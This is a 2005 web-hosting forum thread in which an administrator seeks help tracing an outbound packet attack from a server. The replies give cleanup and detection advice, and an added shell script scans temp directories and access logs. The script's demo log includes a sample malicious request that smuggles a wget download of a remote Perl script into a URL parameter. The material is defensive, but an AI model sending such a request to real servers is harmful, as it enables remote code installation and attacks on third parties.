The Community Forums


Outbound attack please help

Discussion in 'General Discussion' started by shann, Nov 3, 2005.

  1. shann

    Hi,

    Someone is doing an outbound attack from our server and we got a complaint from the DC, but they haven't provided the info. They provided the IP address which was hit from our server.

    What file do I need to check?

    Can anyone help me?

    thanks
    shan
     
  2. Freezer

    Scan your /tmp and /var/tmp for strange files belonging to nobody, and search the forums for "outbound UDP attack"; that will show a thread with more helpful info.
     
  3. AndyReed

    You need to clean up your server from all the strange files downloaded and/or installed on your server. Kill all the processes used/exhausted by these tools and then you need to patch, upgrade, and secure your server. Good luck!
     
  4. BianchiDude

    Also check /dev/shm
     
  5. panayot

  6. shann

    Thank you guys, but I have the targeted IP. Is there any way I can track it down?
    Can we check it in /var/log/messages?

    thanks
     
  7. shann

    I have installed APF. How do we stop the outbound attack? I have the targeted IP.

    Please help me.

    thanks
     
  8. NightStorm

    With APF, set up and enable egress filtering. It will not stop your server from sending the attack, but it will stop the packets from leaving your server.
    Check server logs (httpd logs) for the word wget. This is often used as part of a URL exploit that tells a site on your server to download and install a Perl script to launch packet attacks. This will give you an idea of how the attack was started, and which site you need to be checking.
    Look for outdated programs on your server (read: phpBB).
    Run rkhunter.
    Secure your /tmp directory.
    Search the /tmp directory for any .pl files. If you find them, delete them.
    http://eth0.us is a good place to start.
     
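    A small triage helper for two of the checks given above: the scan of /tmp, /var/tmp and /dev/shm for files owned by nobody or named *.pl from the earlier replies, and the grep through the httpd logs for wget from the reply just above. This is an added example, not code from the thread; the log location, the "nobody" account and the sample log lines are assumptions or constructed data.

```shell
#!/bin/sh
# Added triage helper (not from the thread). Two checks the replies describe:
#   1. find_wget_requests: flag requests whose request line itself contains
#      "wget", i.e. a download command smuggled into a URL parameter, while
#      ignoring a legitimate "Wget/..." User-Agent further along the line.
#   2. scan_scratch_dirs: list files in scratch directories that are owned by
#      the web-server user or end in .pl.
# Assumptions: Apache runs as "nobody" and cPanel per-domain logs live under
# /usr/local/apache/domlogs; any combined-format access log works.

# Usage: find_wget_requests LOGFILE...   Output: "client_ip<TAB>request_line"
find_wget_requests() {
    # Splitting on the double quote, $2 is the request line and $6 the
    # User-Agent; only $2 is inspected, so a Wget client alone is not a hit.
    awk -F'"' 'tolower($2) ~ /wget/ { split($1, pre, " "); print pre[1] "\t" $2 }' "$@"
}

# Usage: scan_scratch_dirs USER DIR...   Output: one suspicious path per line
scan_scratch_dirs() {
    owner="$1"; shift
    for d in "$@"; do
        [ -d "$d" ] || continue
        if id "$owner" >/dev/null 2>&1; then
            find "$d" -type f \( -user "$owner" -o -name '*.pl' \) 2>/dev/null || true
        else
            # Unknown account on this box: fall back to the name check only.
            find "$d" -type f -name '*.pl' 2>/dev/null || true
        fi
    done
}

# Stand-alone demo on constructed data (not real traffic or real files).
demo_log=$(mktemp)
cat >"$demo_log" <<'EOF'
203.0.113.7 - - [03/Nov/2005:10:12:01 +0000] "GET /index.php?page=http://198.51.100.9/r.txt?cmd=wget%20http://198.51.100.9/s.pl HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.22 - - [03/Nov/2005:10:12:05 +0000] "GET /robots.txt HTTP/1.0" 200 44 "-" "Wget/1.10.2"
192.0.2.15 - - [03/Nov/2005:10:13:40 +0000] "GET /forum/index.php HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
EOF
echo "== requests carrying wget in the URL =="
find_wget_requests "$demo_log"

demo_dir=$(mktemp -d)
: >"$demo_dir/x.pl"; : >"$demo_dir/sess_abc123"
echo "== suspicious files (real use: scan_scratch_dirs nobody /tmp /var/tmp /dev/shm) =="
scan_scratch_dirs nobody "$demo_dir"
rm -rf "$demo_log" "$demo_dir"
```

    On a real box the second function is run as root with /tmp, /var/tmp and /dev/shm as the directories, and each hit from the first function names the vhost log (and so the site) that needs checking.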
  9. avijit

    Check all the current processes through ps -auxf | more. It can give you a glimpse of the attack that is originating from the server. Probably someone is scanning the other host for a vulnerability.
     
  10. shann

    Hi,

    I have used rkhunter and got the following message. Does anything need to be fixed?
    Any help would be appreciated.


    Security advisories
    * Check: Groups and Accounts
    Searching for /etc/passwd... [ Found ]
    Checking users with UID '0' (root)... [ OK ]

    * Check: SSH
    Searching for sshd_config...
    Found /etc/ssh/sshd_config
    Checking for allowed root login... Watch out Root login possible. Possible risk!
    info:
    Hint: See logfile for more information about this issue
    Checking for allowed protocols... [ Warning (SSH v1 allowed) ]


    Also, got this

    D5
    MD5 compared: 0
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 342
    Possible infected files: 0

    Application scan
    Vulnerable applications: 3

    Scanning took 466 seconds


    How do we track it down?
     
  11. dalem

    Your server most likely is not compromised; some sort of UDP or TCP flooder was uploaded into your tmp dir through an insecure PHP script.


    Run a ps auxf and look for something running that should not be.


    My god man, if you can't find what's leaving your server, hire someone to track it down for you.
    We can't see it from the forums :)
     